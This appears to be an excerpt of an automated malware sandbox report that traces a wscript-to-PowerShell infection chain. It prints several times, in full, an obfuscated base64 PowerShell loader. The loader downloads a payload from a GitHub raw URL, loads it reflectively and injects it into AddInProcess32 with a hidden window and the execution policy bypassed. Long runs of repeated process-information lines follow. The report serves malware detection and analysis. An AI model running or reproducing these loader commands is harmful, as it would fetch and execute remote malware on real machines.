Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'LiggJHBzSE9NRVsyMV0rJHBTSE9NZVszNF0rJ3gnKSg", "0", "false");
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'LiggJHBzSE9NRVsyMV0rJHBTSE9NZVszNF0rJ3gnKSgoKCdDJysnaVN1cmwgPScrJyBmJysnbVVodHRwczovJysnL3JhdycrJy5nJysnaXQnKydodWJ1JysncycrJ2VyJysnYycrJ28nKydudGVudCcrJy5jb20vTm8nKydEZXRlJysnY3RPbicrJy8nKydObycrJ0RlJysndGVjdE8nKyduL3JlZicrJ3MvJysnaGVhZHMnKycvJysnbWFpJysnbi9EJysnZXQnKydhaCcrJ05vdGgtVi50JysneHQnKydmbVU7IENpU2Jhc2U2NENvJysnbnRlJysnbnQgPSAoTmV3LU8nKydiJysnamVjdCcrJyBTeXN0ZW0uTicrJ2V0LldlYkMnKydsaScrJ2VudCkuJysnRG93bmxvYScrJ2RTJysndHInKydpbmcnKycoQ2knKydTdXInKydsKTsgQycrJ2lTYicrJ2knKyduYScrJ3J5JysnQ28nKydudCcrJ2VudCA9JysnICcrJ1tTeXN0ZScrJ20uQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpJysnbmcoJysnQycrJ2lTYmFzZTY0Q29uJysndGVudCk7JysnIEMnKydpUycrJ2Fzc2VtYicrJ2x5ID0nKycgJysnW1InKydlZmxlY3RpbycrJ24uQXMnKydzZW0nKydibHknKyddOjpMbycrJ2FkKCcrJ0MnKydpU2JpJysnbicrJ2FyeScrJ0MnKydvbnRlbicrJ3QnKycpJysnOyBbZG5saWIuSU8nKycuSG9tZV06OlZBSSgnKydhJysnM1UwL2RpeUtGL2QvZWUuJysnZXQnKydzJysnYXAnKycvLzpzcCcrJ3R0aGEzVSwgYTMnKydVZGVzJysnYScrJ3RpJysndicrJ2EnKydkb2EzVScrJywnKycgYScrJzNVZGUnKydzJysnYXRpdmEnKydkbycrJ2EzJysnVSwgYTNVZGUnKydzYXQnKydpJysndmFkb2EzVSwgYTNVQScrJ2RkJysnSW5QJysncm9jZScrJ3NzMzInKydhM1UsIGEzVWEnKyczVSxhM1VhJysnM1UpJykgLVJFcGxBY2UgIChbQ2hBcl05NytbQ2hBcl01MStbQ2hBcl04NSksW0NoQXJdMzQgLWNyZVBMYUNFICAnZm1VJyxbQ2hBcl0zOSAgLVJFcGxBY2UgIChbQ2hBcl02NytbQ2hBcl0xMDUrW0NoQXJdODMpLFtDaEFyXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHOME[21]+$pSHOMe[34]+'x')((('C'+'iSurl ='+' f'+'mUhttps:/'+'/raw'+'.g'+'it'+'hubu'+'s'+'er'+'c'+'o'+'ntent'+'.com/No'+'Dete'+'ctOn'+'/'+'No'+'De'+'tectO'+'n/ref'+'s/'+'heads'+'/'+'mai'+'n/D'+'et'+'ah'+'Noth-V.t'+'xt'+'fmU; CiSbase64Co'+'nte'+'nt = (New-O'+'b'+'ject'+' System.N'+'et.WebC'+'li'+'ent).'+'Downloa'+'dS'+'tr'+'ing'+'(Ci'+'Sur'+'l); C'+'iSb'+'i'+'na'+'ry'+'Co'+'nt'+'ent ='+' '+'[Syste'+'m.Con'+'vert'+']::FromBase64S'+'t'+'ri'+'ng('+'C'+'iSbase64Con'+'tent);'+' C'+'iS'+'assemb'+'ly ='+' '+'[R'+'eflectio'+'n.As'+'sem'+'bly'+']::Lo'+'ad('+'C'+'iSbi'+'n'+'ary'+'C'+'onten'+'t'+')'+'; [dnlib.IO'+'.Home]::VAI('+'a'+'3U0/diyKF/d/ee.'+'et'+'s'+'ap'+'//:sp'+'ttha3U, a3'+'Udes'+'a'+'ti'+'v'+'a'+'doa3U'+','+' a'+'3Ude'+'s'+'ativa'+'do'+'a3'+'U, a3Ude'+'sat'+'i'+'vadoa3U, a3UA'+'dd'+'InP'+'roce'+'ss32'+'a3U, a3Ua'+'3U,a3Ua'+'3U)') -REplAce ([ChAr]97+[ChAr]51+[ChAr]85),[ChAr]34 -crePLaCE 'fmU',[ChAr]39 -REplAce ([ChAr]67+[ChAr]105+[ChAr]83),[ChAr]36) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHOME[21]+$pSHOMe[34]+'x')((('C'+'iSurl ='+' f'+'mUhttps:/'+'/raw'+'.g'+'it'+'hubu'+'s'+'er'+'c'+'o'+'ntent'+'.com/No'+'Dete'+'ctOn'+'/'+'No'+'De'+'tectO'+'n/ref'+'s/'+'heads'+'/'+'mai'+'n/D'+'et'+'ah'+'Noth-V.t'+'xt'+'fmU; CiSbase64Co'+'nte'+'nt = (New-O'+'b'+'ject'+' System.N'+'et.WebC'+'li'+'ent).'+'Downloa'+'dS'+'tr'+'ing'+'(Ci'+'Sur'+'l); C'+'iSb'+'i'+'na'+'ry'+'Co'+'nt'+'ent ='+' '+'[Syste'+'m.Con'+'vert'+']::FromBase64S'+'t'+'ri'+'ng('+'C'+'iSbase64Con'+'tent);'+' C'+'iS'+'assemb'+'ly ='+' '+'[R'+'eflectio'+'n.As'+'sem'+'bly'+']::Lo'+'ad('+'C'+'iSbi'+'n'+'ary'+'C'+'onten'+'t'+')'+'; [dnlib.IO'+'.Home]::VAI('+'a'+'3U0/diyKF/d/ee.'+'et'+'s'+'ap'+'//:sp'+'ttha3U, a3'+'Udes'+'a'+'ti'+'v'+'a'+'doa3U'+','+' a'+'3Ude'+'s'+'ativa'+'do'+'a3'+'U, a3Ude'+'sat'+'i'+'vadoa3U, a3UA'+'dd'+'InP'+'roce'+'ss32'+'a3U, a3Ua'+'3U,a3Ua'+'3U)') -REplAce ([ChAr]97+[ChAr]51+[ChAr]85),[ChAr]34 -crePLaCE 'fmU',[ChAr]39 -REplAce ([ChAr]67+[ChAr]105+[ChAr]83),[ChAr]36) )" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSE9NRVsyMV0rJHBTSE9NZVszNF0rJ3gnKSgoKCdDJysnaVN1cmwgPScrJyBmJysnbVVodHRwczovJysnL3JhdycrJy5nJysnaXQnKydodWJ1JysncycrJ2VyJysnYycrJ28nKydudGVudCcrJy5jb20vTm8nKydEZXRlJysnY3RPbicrJy8nKydObycrJ0RlJysndGVjdE8nKyduL3JlZicrJ3MvJysnaGVhZHMnKycvJysnbWFpJysnbi9EJysnZXQnKydhaCcrJ05vdGgtVi50JysneHQnKydmbVU7IENpU2Jhc2U2NENvJysnbnRlJysnbnQgPSAoTmV3LU8nKydiJysnamVjdCcrJyBTeXN0ZW0uTicrJ2V0LldlYkMnKydsaScrJ2VudCkuJysnRG93bmxvYScrJ2RTJysndHInKydpbmcnKycoQ2knKydTdXInKydsKTsgQycrJ2lTYicrJ2knKyduYScrJ3J5JysnQ28nKydudCcrJ2VudCA9JysnICcrJ1tTeXN0ZScrJ20uQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpJysnbmcoJysnQycrJ2lTYmFzZTY0Q29uJysndGVudCk7JysnIEMnKydpUycrJ2Fzc2VtYicrJ2x5ID0nKycgJysnW1InKydlZmxlY3RpbycrJ24uQXMnKydzZW0nKydibHknKyddOjpMbycrJ2FkKCcrJ0MnKydpU2JpJysnbicrJ2FyeScrJ0MnKydvbnRlbicrJ3QnKycpJysnOyBbZG5saWIuSU8nKycuSG9tZV06OlZBSSgnKydhJysnM1UwL2RpeUtGL2QvZWUuJysnZXQnKydzJysnYXAnKycvLzpzcCcrJ3R0aGEzVSwgYTMnKydVZGVzJysnYScrJ3RpJysndicrJ2EnKydkb2EzVScrJywnKycgYScrJzNVZGUnKydzJysnYXRpdmEnKydkbycrJ2EzJysnVSwgYTNVZGUnKydzYXQnKydpJysndmFkb2EzVSwgYTNVQScrJ2RkJysnSW5QJysncm9jZScrJ3NzMzInKydhM1UsIGEzVWEnKyczVSxhM1VhJysnM1UpJykgLVJFcGxBY2UgIChbQ2hBcl05NytbQ2hBcl01MStbQ2hBcl04NSksW0NoQXJdMzQgLWNyZVBMYUNFICAnZm1VJyxbQ2hBcl0zOSAgLVJFcGxBY2UgIChbQ2hBcl02NytbQ2hBcl0xMDUrW0NoQXJdODMpLFtDaEFyXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHOME[21]+$pSHOMe[34]+'x')((('C'+'iSurl ='+' f'+'mUhttps:/'+'/raw'+'.g'+'it'+'hubu'+'s'+'er'+'c'+'o'+'ntent'+'.com/No'+'Dete'+'ctOn'+'/'+'No'+'De'+'tectO'+'n/ref'+'s/'+'heads'+'/'+'mai'+'n/D'+'et'+'ah'+'Noth-V.t'+'xt'+'fmU; CiSbase64Co'+'nte'+'nt = (New-O'+'b'+'ject'+' System.N'+'et.WebC'+'li'+'ent).'+'Downloa'+'dS'+'tr'+'ing'+'(Ci'+'Sur'+'l); C'+'iSb'+'i'+'na'+'ry'+'Co'+'nt'+'ent ='+' '+'[Syste'+'m.Con'+'vert'+']::FromBase64S'+'t'+'ri'+'ng('+'C'+'iSbase64Con'+'tent);'+' C'+'iS'+'assemb'+'ly ='+' '+'[R'+'eflectio'+'n.As'+'sem'+'bly'+']::Lo'+'ad('+'C'+'iSbi'+'n'+'ary'+'C'+'onten'+'t'+')'+'; [dnlib.IO'+'.Home]::VAI('+'a'+'3U0/diyKF/d/ee.'+'et'+'s'+'ap'+'//:sp'+'ttha3U, a3'+'Udes'+'a'+'ti'+'v'+'a'+'doa3U'+','+' a'+'3Ude'+'s'+'ativa'+'do'+'a3'+'U, a3Ude'+'sat'+'i'+'vadoa3U, a3UA'+'dd'+'InP'+'roce'+'ss32'+'a3U, a3Ua'+'3U,a3Ua'+'3U)') -REplAce ([ChAr]97+[ChAr]51+[ChAr]85),[ChAr]34 -crePLaCE 'fmU',[ChAr]39 -REplAce ([ChAr]67+[ChAr]105+[ChAr]83),[ChAr]36) )"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSE9NRVsyMV0rJHBTSE9NZVszNF0rJ3gnKSgoKCdDJysnaVN1cmwgPScrJyBmJysnbVVodHRwczovJysnL3JhdycrJy5nJysnaXQnKydodWJ1JysncycrJ2VyJysnYycrJ28nKydudGVudCcrJy5jb20vTm8nKydEZXRlJysnY3RPbicrJy8nKydObycrJ0RlJysndGVjdE8nKyduL3JlZicrJ3MvJysnaGVhZHMnKycvJysnbWFpJysnbi9EJysnZXQnKydhaCcrJ05vdGgtVi50JysneHQnKydmbVU7IENpU2Jhc2U2NENvJysnbnRlJysnbnQgPSAoTmV3LU8nKydiJysnamVjdCcrJyBTeXN0ZW0uTicrJ2V0LldlYkMnKydsaScrJ2VudCkuJysnRG93bmxvYScrJ2RTJysndHInKydpbmcnKycoQ2knKydTdXInKydsKTsgQycrJ2lTYicrJ2knKyduYScrJ3J5JysnQ28nKydudCcrJ2VudCA9JysnICcrJ1tTeXN0ZScrJ20uQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpJysnbmcoJysnQycrJ2lTYmFzZTY0Q29uJysndGVudCk7JysnIEMnKydpUycrJ2Fzc2VtYicrJ2x5ID0nKycgJysnW1InKydlZmxlY3RpbycrJ24uQXMnKydzZW0nKydibHknKyddOjpMbycrJ2FkKCcrJ0MnKydpU2JpJysnbicrJ2FyeScrJ0MnKydvbnRlbicrJ3QnKycpJysnOyBbZG5saWIuSU8nKycuSG9tZV06OlZBSSgnKydhJysnM1UwL2RpeUtGL2QvZWUuJysnZXQnKydzJysnYXAnKycvLzpzcCcrJ3R0aGEzVSwgYTMnKydVZGVzJysnYScrJ3RpJysndicrJ2EnKydkb2EzVScrJywnKycgYScrJzNVZGUnKydzJysnYXRpdmEnKydkbycrJ2EzJysnVSwgYTNVZGUnKydzYXQnKydpJysndmFkb2EzVSwgYTNVQScrJ2RkJysnSW5QJysncm9jZScrJ3NzMzInKydhM1UsIGEzVWEnKyczVSxhM1VhJysnM1UpJykgLVJFcGxBY2UgIChbQ2hBcl05NytbQ2hBcl01MStbQ2hBcl04NSksW0NoQXJdMzQgLWNyZVBMYUNFICAnZm1VJyxbQ2hBcl0zOSAgLVJFcGxBY2UgIChbQ2hBcl02NytbQ2hBcl0xMDUrW0NoQXJdODMpLFtDaEFyXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHOME[21]+$pSHOMe[34]+'x')((('C'+'iSurl ='+' f'+'mUhttps:/'+'/raw'+'.g'+'it'+'hubu'+'s'+'er'+'c'+'o'+'ntent'+'.com/No'+'Dete'+'ctOn'+'/'+'No'+'De'+'tectO'+'n/ref'+'s/'+'heads'+'/'+'mai'+'n/D'+'et'+'ah'+'Noth-V.t'+'xt'+'fmU; CiSbase64Co'+'nte'+'nt = (New-O'+'b'+'ject'+' System.N'+'et.WebC'+'li'+'ent).'+'Downloa'+'dS'+'tr'+'ing'+'(Ci'+'Sur'+'l); C'+'iSb'+'i'+'na'+'ry'+'Co'+'nt'+'ent ='+' '+'[Syste'+'m.Con'+'vert'+']::FromBase64S'+'t'+'ri'+'ng('+'C'+'iSbase64Con'+'tent);'+' C'+'iS'+'assemb'+'ly ='+' '+'[R'+'eflectio'+'n.As'+'sem'+'bly'+']::Lo'+'ad('+'C'+'iSbi'+'n'+'ary'+'C'+'onten'+'t'+')'+'; [dnlib.IO'+'.Home]::VAI('+'a'+'3U0/diyKF/d/ee.'+'et'+'s'+'ap'+'//:sp'+'ttha3U, a3'+'Udes'+'a'+'ti'+'v'+'a'+'doa3U'+','+' a'+'3Ude'+'s'+'ativa'+'do'+'a3'+'U, a3Ude'+'sat'+'i'+'vadoa3U, a3UA'+'dd'+'InP'+'roce'+'ss32'+'a3U, a3Ua'+'3U,a3Ua'+'3U)') -REplAce ([ChAr]97+[ChAr]51+[ChAr]85),[ChAr]34 -crePLaCE 'fmU',[ChAr]39 -REplAce ([ChAr]67+[ChAr]105+[ChAr]83),[ChAr]36) )" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD342100BD pushad ; iretd 2_2_00007FFD342100C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD34210952 push E95B7AD0h; ret 2_2_00007FFD342109C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD341F00BD pushad ; iretd 4_2_00007FFD341F00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD341F08ED push E95B7C1Ch; ret 4_2_00007FFD341F0909
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD341F75E6 push esp; iretd 4_2_00007FFD341F75EC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD342C78E1 push edi; iretd 4_2_00007FFD342C78E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD342C7B66 push ebp; iretd 4_2_00007FFD342C7B68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0042C1D8 push eax; retn 0000h 5_2_0042C25E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0042C188 push ebp; retn 0000h 5_2_0042C18A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 5_2_0042C270 push edx; retn 0000h 5_2_0042C2B2
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
